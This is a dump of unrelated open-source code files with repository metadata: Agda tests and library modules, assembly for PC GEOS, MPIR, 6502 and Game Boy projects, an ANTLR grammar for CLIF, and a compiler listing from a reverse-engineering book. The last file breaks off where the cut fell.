test/Succeed/Tactic.agda	hborum/agda	3	11226	<filename>test/Succeed/Tactic.agda open import Common.Prelude open import Common.Reflection open import Common.Equality postulate trustme : ∀ {a} {A : Set a} {x y : A} → x ≡ y magic : List (Arg Type) → Term → Tactic magic _ _ = give (def (quote trustme) []) id : ∀ {a} {A : Set a} → A → A id x = x science : List (Arg Type) → Term → Tactic science _ _ = give (def (quote id) []) by-magic : ∀ n → n + 4 ≡ 3 by-magic n = tactic magic by-science : ∀ n → 0 + n ≡ n by-science n = tactic science \| refl
programs/oeis/174/A174192.asm	neoneye/loda	22	82917	<gh_stars>10-100 ; A174192: Expansion of (1-x+2x^2)/ ((1-x)(1-2x-x^2)). ; 1,2,7,18,45,110,267,646,1561,3770,9103,21978,53061,128102,309267,746638,1802545,4351730,10506007,25363746,61233501,147830750,356895003,861620758,2080136521,5021893802,12123924127 add $0,1 seq $0,78343 ; a(0) = -1, a(1) = 2; a(n) = 2a(n-1) + a(n-2). sub $0,1
clif/CLIF.g4	augustand/grammars-v4	1	20	<reponame>augustand/grammars-v4<gh_stars>1-10 /* [The "BSD licence"] Copyright (c) 2015 <NAME> All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. The name of the author may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. / / Derived from ISO/IEC STANDARD 24707 First edition 2007-10-01 http://standards.iso.org/ittf/PubliclyAvailableStandards/c039175_ISO_IEC_24707_2007%28E%29.zip with bug fixes from http://metadata-standards.org/Document-library/Documents-by-number/WG2-N1701-N1750/WG2N1703_24707-defect-report.pdf example clif ontologies available from COLORE http://stl.mie.utoronto.ca/colore/ / grammar CLIF; //A.2.3.1 Term sequence termseq : (term \| SEQMARK) ; //A.2.3.2 Name interpretedname : NUMERAL \| QUOTEDSTRING ; interpretablename : NAMECHARSEQUENCE \| ENCLOSEDNAME ; name : interpretedname \| interpretablename ; //A.2.3.3 Term term : name \| OPEN operator termseq CLOSE \| OPEN 'cl-comment' QUOTEDSTRING term CLOSE ; operator : term ; //A.2.3.4 Equation equation : OPEN '=' term term CLOSE ; //A.2.3.5 Sentence sentence : atomsent \| boolsent \| quantsent \| commentsent ; //A.2.3.6 Atomic sentence atomsent : equation \| atom ; atom : OPEN predicate termseq CLOSE \| OPEN term OPEN 'cl-roleset' (OPEN name term CLOSE) CLOSE CLOSE ; predicate : term ; //A.2.3.7 Boolean sentence boolsent : OPEN ('and' \| 'or') sentence* CLOSE \| OPEN ('if' \| 'iff') sentence sentence CLOSE \| OPEN 'not' sentence CLOSE ; //A.2.3.8 Quantified sentence quantsent : OPEN ('forall' \| 'exists') interpretablename? boundlist sentence CLOSE ; boundlist : OPEN ( interpretablename \| SEQMARK \| OPEN (interpretablename \| SEQMARK) term CLOSE )* CLOSE ; //A.2.3.9 Commented sentence commentsent : OPEN 'cl-comment' ENCLOSEDNAME sentence CLOSE ; //A.2.3.10 Module module : OPEN 'cl-module' interpretablename (OPEN 'cl-excludes' name* CLOSE)? cltext? CLOSE ; //A.2.3.11 Phrase phrase : sentence \| module \| OPEN 'cl-imports' interpretablename CLOSE \| OPEN 'cl-comment' ENCLOSEDNAME cltext? CLOSE ; text : phrase+ ; cltext : module \| namedtext \| text ; namedtext : OPEN 'cl-text' interpretablename text? CLOSE ; //A.2.2.2 Delimiters OPEN : '('; CLOSE : ')'; STRINGQUOTE : '\''; NAMEQUOTE : '"'; BACKSLASH : '\\'; //A.2.2.3 Characters fragment CHAR : [0-9~!#$%^&_+{}\|:<>?`\-=\[\];,./A-Za-z]; fragment DIGIT : [0-9]; fragment HEXA : [0-9A-Fa-f]; //A.2.2.4 Quoting within strings fragment NONASCII : '\\' 'u' HEXA HEXA HEXA HEXA \| '\\' 'U' HEXA HEXA HEXA HEXA HEXA HEXA ; fragment INNERSTRINGQUOTE : '\'' ; fragment INNERNAMEQUOTE : '\"' ; fragment INNERBACKSLASH : '\\'; NUMERAL : DIGIT+; SEQMARK : '...' CHAR; //A.2.2.5 Quoted strings QUOTEDSTRING : STRINGQUOTE (WHITE \| OPEN \| CLOSE \| CHAR \| NONASCII \| NAMEQUOTE \| INNERSTRINGQUOTE \| INNERBACKSLASH )* STRINGQUOTE ; ENCLOSEDNAME : NAMEQUOTE (WHITE \| OPEN \| CLOSE \| CHAR \| NONASCII \| STRINGQUOTE \| INNERNAMEQUOTE )* NAMEQUOTE ; //A.2.2.6 Reserved tokens EQUAL : '='; AND : 'and'; OR : 'or'; IFF : 'iff'; IF : 'if'; FORALL : 'forall'; EXISTS : 'exists'; NOT : 'not'; CL_ROLESET : 'cl-roleset'; CL_TEXT : 'cl-text'; CL_IMPORTS : 'cl-imports'; CL_EXCLUDES : 'cl-excludes'; CL_MODULE : 'cl-module'; CL_COMMENT : 'cl-comment'; CL_PREFIX : 'cl-prefix'; //A.2.2.7 Name character sequence NAMECHARSEQUENCE : ( CHAR (CHAR \| STRINGQUOTE \| NAMEQUOTE \| BACKSLASH)* ) ; // A.2.2.1 White space WHITE : [ \t\n\r\v] -> skip ; BLOCKCOMMENT : '/' (BLOCKCOMMENT \| .)? '/' -> skip // nesting allowed (but should it be?) ; LineComment : '//' ~[\u000A\u000D] -> skip ;
src/main/fragment/mos6502-common/vbuyy=vbuc1.asm	jbrandwood/kickc	2	104909	ldy #{c1}
Library/User/User/userFlowMisc.asm	steakknife/pcgeos	504	168180	<filename>Library/User/User/userFlowMisc.asm COMMENT @----------------------------------------------------------------------- Copyright (c) GeoWorks 1988 -- All Rights Reserved PROJECT: PC GEOS MODULE: UserInterface/User FILE: userFlowMisc.asm ROUTINES: Name Description ---- ----------- ; Global routines, callable from ANY thread ; ; Button utilities ; GLB FlowTranslatePassiveButton ; Translate a ; MSG_META_PRE_PASSIVE_BUTTON or ; MSG_META_POST_PASSIVE_BUTTON to a ; generic method GLB FlowGetUIButtonFlags ; Return the current UIButtonFlag GLB FlowCheckKbdShortcut REVISION HISTORY: Name Date Description ---- ---- ----------- Doug 3/89 Initial version Doug 12/89 Cleaned up file organization DESCRIPTION: This file contains routines to handle input processing for the User Interface. $Id: userFlowMisc.asm,v 1.1 97/04/07 11:46:00 newdeal Exp $ -------------------------------------------------------------------------------@ FlowCommon segment resource COMMENT @---------------------------------------------------------------------- FUNCTION: FlowTranslatePassiveButton DESCRIPTION: Translate a MSG_META_PRE_PASSIVE_BUTTON or MSG_META_POST_PASSIVE_BUTTON to a generic method CALLED BY: GLOBAL PASS: ax - MSG_META_PRE_PASSIVE_BUTTON or MSG_META_POST_PASSIVE_BUTTON cx, dx - mouse position (not used here, but left intact through call) bp - Data as passed in bp to above methods: low - ButtonInfo mask BI_PRESS - set if press mask BI_DOUBLE_PRESS - set if double-press mask BI_B3_DOWN - state of button 3 mask BI_B2_DOWN - state of button 2 mask BI_B1_DOWN - state of button 1 mask BI_B0_DOWN - state of button 0 high - UIFunctionsActive RETURN: ax, cx, dx, bp - translated method (ready to send) DESTROYED: REGISTER/STACK USAGE: PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- Tony 3/89 Initial version ------------------------------------------------------------------------------@ FlowTranslatePassiveButton proc far if (0) push ds push ax mov ax, segment idata mov ds, ax pop ax cmp ax,MSG_META_PRE_PASSIVE_BUTTON mov ax,MSG_META_PRE_PASSIVE_START_SELECT - MSG_META_START_SELECT jz FTPB_10 mov ax,MSG_META_POST_PASSIVE_START_SELECT - MSG_META_START_SELECT FTPB_10: EC < tst ds:[activeMouseMethod] > EC < ERROR_Z UI_ERROR_CURRENT_MOUSE_MSG_SHOULD_NOT_BE_NULL > add ax,ds:[activeMouseMethod] ;add method ;get [UIFunctionsActive \| buttonInfo] ; mov bp,word ptr ds:[activeMouseButtonInfo] pop ds else push bx mov bx, bp cmp ax, MSG_META_PRE_PASSIVE_BUTTON mov ax, MSG_META_PRE_PASSIVE_START_SELECT - MSG_META_START_SELECT jz prePostDone mov ax,MSG_META_POST_PASSIVE_START_SELECT - MSG_META_START_SELECT prePostDone: test bh, mask UIFA_SELECT jnz startSelect test bh, mask UIFA_MOVE_COPY jnz moveCopy test bh, mask UIFA_FEATURES jnz features ;other: add ax, MSG_META_START_OTHER jmp short haveFunction startSelect: add ax, MSG_META_START_SELECT jmp short haveFunction moveCopy: add ax, MSG_META_START_MOVE_COPY jmp short haveFunction features: add ax, MSG_META_START_FEATURES haveFunction: test bl, mask BI_PRESS jnz havePressRelease inc ax ; switch to END method if release havePressRelease: pop bx endif ret FlowTranslatePassiveButton endp FlowCommon ends ; ;------------------- ; Resident segment resource COMMENT @---------------------------------------------------------------------- FUNCTION: FlowGetUIButtonFlags DESCRIPTION: Return the current UIButtonFlags CALLED BY: GLOBAL PASS: none RETURN: al - UIButtonFlags (UIBF_CLICK_TO_TYPE, etc) DESTROYED: REGISTER/STACK USAGE: PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- Tony 3/89 Initial version Doug 5/91 Changed name, changed to only get ButtonFlags ------------------------------------------------------------------------------@ FlowGetUIButtonFlags proc far push ds push ax mov ax, segment idata mov ds, ax pop ax mov al, ds:[uiButtonFlags] ; get UIButtonFlags var pop ds ret FlowGetUIButtonFlags endp ife FULL_EXECUTE_IN_PLACE Resident ends ; ;--------------- ; Navigation segment resource endif COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% FlowCheckKbdShortcut %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Check to see if the key event maps to a shortcut. CALLED BY: utility PASS: ds:si = pointer to a shortcut table. (ds:si can be pointing to the movable XIP code resource.) ax = # of entries in the table. same as MSG_META_KBD_CHAR: cl - Character (Chars or VChar) ch - CharacterSet (CS_BSW or CS_CONTROL) dl - CharFlags dh - ShiftState (left from conversion) bp low - ToggleState bp high - scan code RETURN: si = offset into table where shortcut was found. carry set if a kbd shortcut match was found. DESTROYED: nothing PSEUDO CODE/STRATEGY: Should cache entry point and deal with changing keyboard drivers REVISION HISTORY: Name Date Description ---- ---- ----------- jcw 2/20/90 Initial version Eric/Tony 2/21/90 moved from User/Text to User/User/userFlowUtils %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ FlowCheckKbdShortcut proc far uses bx, es, ds, di .enter sub sp, size dword mov di, sp segmov es, ds ; es:si <- ptr to table. push ax, si mov ax, GDDT_KEYBOARD call GeodeGetDefaultDriver ; ax <- keyboard driver mov bx, ax ; bx <- kbd driver handle. call GeodeInfoDriver ; ds:si <- ptr to struct. mov ax, ds:[si].DIS_strategy.segment mov bx, ds:[si].DIS_strategy.offset mov ({fptr} ss:[di]).segment, ax ; Save strategy routine addr. mov ({fptr} ss:[di]).offset, bx pop ax, si mov bx, di ; ss:bx = entry point mov di, DR_KBD_CHECK_SHORTCUT call {fptr} ss:[bx] ; Call the driver. lea sp, ss:[bx][size dword] ; preserve carry .leave ret FlowCheckKbdShortcut endp if FULL_EXECUTE_IN_PLACE Resident ends else Navigation ends endif
LibSource/mpir/mpn/x86_64/nehalem/rsh_divrem_hensel_qr_1_2.asm	ekzyis/CrypTool-2	12	102695	<reponame>ekzyis/CrypTool-2 dnl X86_64 mpn_rsh_divrem_hensel_qr_1_2 dnl Copyright 2009 <NAME> dnl This file is part of the MPIR Library. dnl The MPIR Library is free software; you can redistribute it and/or modify dnl it under the terms of the GNU Lesser General Public License as published dnl by the Free Software Foundation; either version 2.1 of the License, or (at dnl your option) any later version. dnl The MPIR Library is distributed in the hope that it will be useful, but dnl WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY dnl or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public dnl License for more details. dnl You should have received a copy of the GNU Lesser General Public License dnl along with the MPIR Library; see the file COPYING.LIB. If not, write dnl to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, dnl Boston, MA 02110-1301, USA. include(`../config.m4') C (rdi,rdx)=( (rsi,rdx)-r9 / rcx ) >> r8 rdx>=1 C rax=hensel remainder from div C This is divrem_hensel_1_2 with shifting on the output of the quotient define(`MOVQ',`movd') ASM_START() PROLOGUE(mpn_rsh_divrem_hensel_qr_1_2) C // 3limb minimum for the mo mov %r9,%r10 mov $2,%r9 sub %rdx,%r9 lea -16(%rdi,%rdx,8),%rdi lea -16(%rsi,%rdx,8),%rsi push %r12 push %r13 push %r14 mov %rcx,%rdx C // rdx is 3 bit inverse mov $64,%rax sub %r8,%rax MOVQ %r8,%mm0 MOVQ %rax,%mm1 mov %rdx,%rax imul %ecx,%edx mov $2,%r11 sub %rdx,%r11 imul %eax,%r11d C //r11 has 4 bits mov %r11,%rax imul %ecx,%r11d mov $2,%rdx sub %r11,%rdx imul %eax,%edx C //rdx has 8 bits mov %rdx,%rax imul %ecx,%edx mov $2,%r11 sub %rdx,%r11 imul %eax,%r11d C //r11 has 16 bits mov %r11,%rax imul %ecx,%r11d mov $2,%rdx sub %r11,%rdx imul %eax,%edx C // rdx has 32 bits mov %rdx,%rax imul %rcx,%rdx mov $2,%r11 sub %rdx,%r11 imul %rax,%r11 C //r11 has 64 bits mov %r11,%rax mov %r11,%r12 mul %rcx neg %rdx imul %rdx,%r12 C // r12,r11 has 128 bits C // for the first limb we can not store (as we have to shift) so we need to C // do first limb separately , we could do it as normal as an extention of C // the loop , but if we do it as a 1 limb inverse then we can start it C // eailer , ie interleave it with the calculation of the 2limb inverse mov %r11,%r13 mov %r12,%r14 mov (%rsi,%r9,8),%r11 sub %r10,%r11 sbb %r10,%r10 imul %r13,%r11 MOVQ %r11,%mm2 psrlq %mm0,%mm2 mov %rcx,%rax mul %r11 mov 8(%rsi,%r9,8),%r11 mov 16(%rsi,%r9,8),%r12 add %r10,%r10 sbb %rdx,%r11 sbb $0,%r12 sbb %r10,%r10 add $2,%r9 jc L(skiplp) ALIGN(16) L(lp): mov %r12,%r8 mov %r13,%rax mul %r11 MOVQ %rax,%mm3 movq %mm3,%mm4 psllq %mm1,%mm3 psrlq %mm0,%mm4 por %mm3,%mm2 movq %mm2,-16(%rdi,%r9,8) imul %r14,%r11 imul %r13,%r12 add %r11,%rdx add %r12,%rdx mov 8(%rsi,%r9,8),%r11 mov 16(%rsi,%r9,8),%r12 MOVQ %rdx,%mm3 movq %mm3,%mm2 psllq %mm1,%mm3 psrlq %mm0,%mm2 por %mm3,%mm4 movq %mm4,-8(%rdi,%r9,8) mov %rcx,%rax mul %rdx add %r10,%r10 sbb $0,%r11 sbb $0,%r12 sbb %r10,%r10 cmp %rax,%r8 sbb %rdx,%r11 sbb $0,%r12 sbb $0,%r10 add $2,%r9 jnc L(lp) L(skiplp): mov %r12,%r8 mov %r13,%rax mul %r11 MOVQ %rax,%mm3 movq %mm3,%mm4 psllq %mm1,%mm3 psrlq %mm0,%mm4 por %mm3,%mm2 movq %mm2,-16(%rdi,%r9,8) imul %r14,%r11 imul %r13,%r12 add %r11,%rdx add %r12,%rdx cmp $0,%r9 jne L(case0) L(case1): mov 8(%rsi,%r9,8),%r11 MOVQ %rdx,%mm3 movq %mm3,%mm2 psllq %mm1,%mm3 psrlq %mm0,%mm2 por %mm3,%mm4 movq %mm4,-8(%rdi,%r9,8) mov %rcx,%rax mul %rdx add %r10,%r10 sbb $0,%r11 sbb %r10,%r10 cmp %rax,%r8 sbb %rdx,%r11 sbb $0,%r10 mov %r11,%rax imul %r13,%rax MOVQ %rax,%mm3 movq %mm3,%mm4 psllq %mm1,%mm3 psrlq %mm0,%mm4 por %mm3,%mm2 movq %mm2,(%rdi,%r9,8) movq %mm4,8(%rdi,%r9,8) mul %rcx add %r10,%r10 mov $0,%rax adc %rdx,%rax pop %r14 pop %r13 pop %r12 emms ret L(case0): MOVQ %rdx,%mm3 movq %mm3,%mm2 psllq %mm1,%mm3 psrlq %mm0,%mm2 por %mm3,%mm4 movq %mm4,-8(%rdi,%r9,8) movq %mm2,(%rdi,%r9,8) mov %rcx,%rax mul %rdx cmp %rax,%r8 mov $0,%rax adc %rdx,%rax sub %r10,%rax pop %r14 pop %r13 pop %r12 emms ret EPILOGUE()
agda-stdlib/src/Data/Product/N-ary/Categorical.agda	DreamLinuxer/popl21-artifact	5	5131	------------------------------------------------------------------------ -- The Agda standard library -- -- This module is DEPRECATED. Please use Data.Vec.Recursive.Categorical -- instead. ------------------------------------------------------------------------ {-# OPTIONS --without-K --safe #-} module Data.Product.N-ary.Categorical where {-# WARNING_ON_IMPORT "Data.Product.N-ary.Categorical was deprecated in v1.1. Use Data.Vec.Recursive.Categorical instead." #-} open import Data.Vec.Recursive.Categorical public
Chapter 09/ifelse/ifelse/ifelse-Optimized.asm	bpbpublications/Implementing-Reverse-Engineering	0	100917	; Listing generated by Microsoft (R) Optimizing Compiler Version 16.00.30319.01 TITLE C:\JitenderN\REBook\ifelse\ifelse\ifelse.cpp .686P .XMM include listing.inc .model flat INCLUDELIB LIBCMT INCLUDELIB OLDNAMES CONST SEGMENT $SG4679 DB 'Input Number1 : ', 00H ORG $+3 $SG4680 DB '%d', 00H ORG $+1 $SG4681 DB 'Input Number2 : ', 00H ORG $+3 $SG4682 DB '%d', 00H ORG $+1 $SG4684 DB 'Number1 and Number2 are equal', 0aH, 00H ORG $+1 $SG4686 DB 'Number1 and Number2 are not equal', 0aH, 00H CONST ENDS PUBLIC _main EXTRN _scanf:PROC EXTRN _printf:PROC ; Function compile flags: /Ogtpy _TEXT SEGMENT _iNumber1$ = -8 ; size = 4 _iNumber2$ = -4 ; size = 4 _main PROC ; File c:\jitendern\rebook\ifelse\ifelse\ifelse.cpp ; Line 7 sub esp, 8 ; Line 10 push OFFSET $SG4679 call _printf ; Line 11 lea eax, DWORD PTR _iNumber1$[esp+12] push eax push OFFSET $SG4680 call _scanf ; Line 12 push OFFSET $SG4681 call _printf ; Line 13 lea ecx, DWORD PTR _iNumber2$[esp+24] push ecx push OFFSET $SG4682 call _scanf ; Line 14 mov edx, DWORD PTR _iNumber1$[esp+32] add esp, 24 ; 00000018H cmp edx, DWORD PTR _iNumber2$[esp+8] jne SHORT $LN2@main ; Line 15 push OFFSET $SG4684 ; Line 17 call _printf add esp, 4 ; Line 18 xor eax, eax add esp, 8 ret 0 $LN2@main: ; Line 17 push OFFSET $SG4686 call _printf add esp, 4 ; Line 18 xor eax, eax add esp, 8 ret 0 _main ENDP _TEXT ENDS END
projects/Links_Awakening_gb.windfish/configuration/datatypes.asm	jverkoey/awaken	68	161701	<filename>projects/Links_Awakening_gb.windfish/configuration/datatypes.asm ; ANIMATED_TILE [Enumerated] [Hex] ANIMATED_TILE_NONE EQU $00 ANIMATED_TILE_COUNTER EQU $01 ANIMATED_TILE_TIDE EQU $02 ANIMATED_TILE_VILLAGE EQU $03 ANIMATED_TILE_DUNGEON_1 EQU $04 ANIMATED_TILE_UNDERGROUND EQU $05 ANIMATED_TILE_LAVA EQU $06 ANIMATED_TILE_DUNGEON_2 EQU $07 ANIMATED_TILE_WARP_TILE EQU $08 ANIMATED_TILE_CURRENTS EQU $09 ANIMATED_TILE_WATERFALL EQU $0A ANIMATED_TILE_WATERFALL_SLOW EQU $0B ANIMATED_TILE_WATER_DUNGEON EQU $0C ANIMATED_TILE_LIGHT_BEAM EQU $0D ANIMATED_TILE_CRYSTAL_BLOCK EQU $0E ANIMATED_TILE_BUBBLES EQU $0F ANIMATED_TILE_WEATHER_VANE EQU $10 ANIMATED_TILE_PHOTO EQU $11 ; BUTTON [Bitmask] [Binary] J_RIGHT EQU %00000001 J_LEFT EQU %00000010 J_UP EQU %00000100 J_DOWN EQU %00001000 J_A EQU %00010000 J_B EQU %00100000 J_SELECT EQU %01000000 J_START EQU %10000000 ; DIRECTION [Enumerated] [Hex] DIRECTION_RIGHT EQU $00 DIRECTION_LEFT EQU $01 DIRECTION_UP EQU $02 DIRECTION_DOWN EQU $03 DIRECTION_KEEP EQU $0F ; GAMEMODE [Enumerated] [Hex] GAMEMODE_INTRO EQU $00 GAMEMODE_CREDITS EQU $01 GAMEMODE_FILE_SELECT EQU $02 GAMEMODE_FILE_NEW EQU $03 GAMEMODE_FILE_DELETE EQU $04 GAMEMODE_FILE_COPY EQU $05 GAMEMODE_FILE_SAVE EQU $06 GAMEMODE_WORLD_MAP EQU $07 GAMEMODE_PEACH_PIC EQU $08 GAMEMODE_MARIN_BEACH EQU $09 GAMEMODE_WF_MURAL EQU $0A GAMEMODE_WORLD EQU $0B GAMEMODE_INVENTORY EQU $0C GAMEMODE_PHOTO_ALBUM EQU $0D GAMEMODE_PHOTO_DIZZY_LINK EQU $0E GAMEMODE_PHOTO_NICE_LINK EQU $0F GAMEMODE_PHOTO_MARIN_CLIFF EQU $10 GAMEMODE_PHOTO_MARIN_WELL EQU $11 GAMEMODE_PHOTO_MABE EQU $12 GAMEMODE_PHOTO_ULRIRA EQU $13 GAMEMODE_PHOTO_BOW_WOW EQU $14 GAMEMODE_PHOTO_THIEF EQU $15 GAMEMODE_PHOTO_FISHERMAN EQU $16 GAMEMODE_PHOTO_ZORA EQU $17 GAMEMODE_PHOTO_KANALET EQU $18 GAMEMODE_PHOTO_GHOST EQU $19 GAMEMODE_PHOTO_BRIDGE EQU $1A ; HW_AUDIO_ENABLE [Bitmask] [Binary] HW_AUDIO_ENABLE EQU %10000000 ; HW_CARTRIDGETYPE [Enumerated] [Hex] cartridge_mbc1_ram_battery EQU $03 ; HW_COLORGAMEBOY [Enumerated] [Hex] not_color_gameboy EQU $00 is_color_gameboy EQU $80 ; HW_DESTINATIONCODE [Enumerated] [Hex] destination_japanese EQU $00 destination_nonjapanese EQU $01 ; HW_IE [Bitmask] [Binary] IE_VBLANK EQU %00000001 IE_LCDC EQU %00000010 IE_TIMEROVERFLOW EQU %00000100 IE_SERIALIO EQU %00001000 IE_PIN1013TRANSITION EQU %00010000 ; HW_RAMSIZE [Enumerated] [Hex] ramsize_none EQU $00 ramsize_1bank EQU $01 ramsize_1bank_ EQU $02 ramsize_4banks EQU $03 ramsize_16banks EQU $04 ; HW_ROMSIZE [Enumerated] [Hex] romsize_2banks EQU $00 romsize_4banks EQU $01 romsize_8banks EQU $02 romsize_16banks EQU $03 romsize_32banks EQU $04 romsize_64banks EQU $05 romsize_128banks EQU $06 romsize_72banks EQU $52 romsize_80banks EQU $53 romsize_96banks EQU $54 ; HW_SUPERGAMEBOY [Enumerated] [Hex] not_super_gameboy EQU $00 is_super_gameboy EQU $80 ; INTERACTIVE_MOTION [Enumerated] [Hex] INTERACTIVE_MOTION_ENABLED EQU $00 INTERACTIVE_MOTION_LOCKED_GRAB_SLASH EQU $01 INTERACTIVE_MOTION_LOCKED_TALKING EQU $02 ; JOYPAD [Bitmask] [Binary] JOYPAD_DIRECTIONS EQU %00010000 JOYPAD_BUTTONS EQU %00100000 ; LCDCF [Bitmask] [Binary] LCDCF_OFF EQU %00000000 LCDCF_ON EQU %10000000 LCDCF_TILEMAP_9C00 EQU %01000000 LCDCF_WINDOW_ON EQU %00100000 LCDCF_BG_CHAR_8000 EQU %00010000 LCDCF_BG_TILE_9C00 EQU %00001000 LCDCF_OBJ_16_16 EQU %00000100 LCDCF_OBJ_DISPLAY EQU %00000010 LCDCF_BG_DISPLAY EQU %00000001 ; LINK_ANIMATION [Enumerated] [Hex] LINK_ANIMATION_STATE_STANDING_DOWN EQU $00 LINK_ANIMATION_STATE_WALKING_DOWN EQU $01 LINK_ANIMATION_STATE_UNKNOWN_02 EQU $02 LINK_ANIMATION_STATE_UNKNOWN_03 EQU $03 LINK_ANIMATION_STATE_STANDING_UP EQU $04 LINK_ANIMATION_STATE_WALKING_UP EQU $05 LINK_ANIMATION_STATE_STANDING_LEFT EQU $06 LINK_ANIMATION_STATE_WALKING_LEFT EQU $07 LINK_ANIMATION_STATE_UNKNOWN_08 EQU $08 LINK_ANIMATION_STATE_UNKNOWN_09 EQU $09 LINK_ANIMATION_STATE_STANDING_RIGHT EQU $0A LINK_ANIMATION_STATE_WALKING_RIGHT EQU $0B LINK_ANIMATION_STATE_HOOKSHOT_CHAIN_DOWN EQU $0E LINK_ANIMATION_STATE_HOOKSHOT_CHAIN_UP EQU $0F LINK_ANIMATION_STATE_HOOKSHOT_CHAIN_LEFT EQU $10 LINK_ANIMATION_STATE_HOOKSHOT_CHAIN_RIGHT EQU $11 LINK_ANIMATION_STATE_UNKNOWN_12 EQU $12 LINK_ANIMATION_STATE_UNKNOWN_13 EQU $13 LINK_ANIMATION_STATE_UNKNOWN_14 EQU $14 LINK_ANIMATION_STATE_UNKNOWN_15 EQU $15 LINK_ANIMATION_STATE_UNKNOWN_16 EQU $16 LINK_ANIMATION_STATE_UNKNOWN_17 EQU $17 LINK_ANIMATION_STATE_UNKNOWN_18 EQU $18 LINK_ANIMATION_STATE_UNKNOWN_19 EQU $19 LINK_ANIMATION_STATE_STANDING_PUSHING_DOWN EQU $1A LINK_ANIMATION_STATE_WALKING_PUSHING_DOWN EQU $1B LINK_ANIMATION_STATE_STANDING_PUSHING_UP EQU $1C LINK_ANIMATION_STATE_WALKING_PUSHING_UP EQU $1D LINK_ANIMATION_STATE_STANDING_PUSHING_LEFT EQU $1E LINK_ANIMATION_STATE_WALKING_PUSHING_LEFT EQU $1F LINK_ANIMATION_STATE_STANDING_PUSHING_RIGHT EQU $20 LINK_ANIMATION_STATE_WALKING_PUSHING_RIGHT EQU $21 LINK_ANIMATION_STATE_STANDING_SHIELD_DOWN EQU $22 LINK_ANIMATION_STATE_WALKING_SHIELD_DOWN EQU $23 LINK_ANIMATION_STATE_STANDING_SHIELD_USE_DOWN EQU $24 LINK_ANIMATION_STATE_WALKING_SHIELD_USE_DOWN EQU $25 LINK_ANIMATION_STATE_STANDING_MIRROR_SHIELD_USE_DOWN EQU $26 LINK_ANIMATION_STATE_WALKING_MIRROR_SHIELD_USE_DOWN EQU $27 LINK_ANIMATION_STATE_STANDING_SHIELD_USE_LEFT EQU $28 LINK_ANIMATION_STATE_WALKING_SHIELD_USE_LEFT EQU $29 LINK_ANIMATION_STATE_STANDING_SHIELD_USE_RIGHT EQU $2A LINK_ANIMATION_STATE_WALKING_SHIELD_USE_RIGHT EQU $2B LINK_ANIMATION_STATE_STANDING_SHIELD_RIGHT EQU $2C LINK_ANIMATION_STATE_WALKING_SHIELD_RIGHT EQU $2D LINK_ANIMATION_STATE_STANDING_MIRROR_SHIELD_RIGHT EQU $2E LINK_ANIMATION_STATE_WALKING_MIRROR_SHIELD_RIGHT EQU $2F LINK_ANIMATION_STATE_STANDING_SHIELD_USE_UP EQU $30 LINK_ANIMATION_STATE_WALKING_SHIELD_USE_UP EQU $31 LINK_ANIMATION_STATE_STANDING_MIRROR_SHIELD_USE_UP EQU $32 LINK_ANIMATION_STATE_WALKING_MIRROR_SHIELD_USE_UP EQU $33 LINK_ANIMATION_STATE_STANDING_SHIELD_UP EQU $34 LINK_ANIMATION_STATE_WALKING_SHIELD_UP EQU $35 LINK_ANIMATION_STATE_UNKNOWN_36 EQU $36 LINK_ANIMATION_STATE_UNKNOWN_38 EQU $38 LINK_ANIMATION_STATE_UNKNOWN_3A EQU $3A LINK_ANIMATION_STATE_UNKNOWN_3C EQU $3C LINK_ANIMATION_STATE_STANDING_LIFTING_RIGHT EQU $3E LINK_ANIMATION_STATE_WALKING_LIFTING_RIGHT EQU $3F LINK_ANIMATION_STATE_STANDING_LIFTING_LEFT EQU $40 LINK_ANIMATION_STATE_WALKING_LIFTING_LEFT EQU $41 LINK_ANIMATION_STATE_STANDING_LIFTING_UP EQU $42 LINK_ANIMATION_STATE_WALKING_LIFTING_UP EQU $43 LINK_ANIMATION_STATE_STANDING_LIFTING_DOWN EQU $44 LINK_ANIMATION_STATE_WALKING_LIFTING_DOWN EQU $45 LINK_ANIMATION_STATE_HOLD_SWIMMING_1_RIGHT EQU $46 LINK_ANIMATION_STATE_MOVING_SWIMMING_1_RIGHT EQU $47 LINK_ANIMATION_STATE_HOLD_SWIMMING_1_LEFT EQU $48 LINK_ANIMATION_STATE_MOVING_SWIMMING_1_LEFT EQU $49 LINK_ANIMATION_STATE_HOLD_SWIMMING_1_UP EQU $4A LINK_ANIMATION_STATE_MOVING_SWIMMING_1_UP EQU $4B LINK_ANIMATION_STATE_HOLD_SWIMMING_1_DOWN 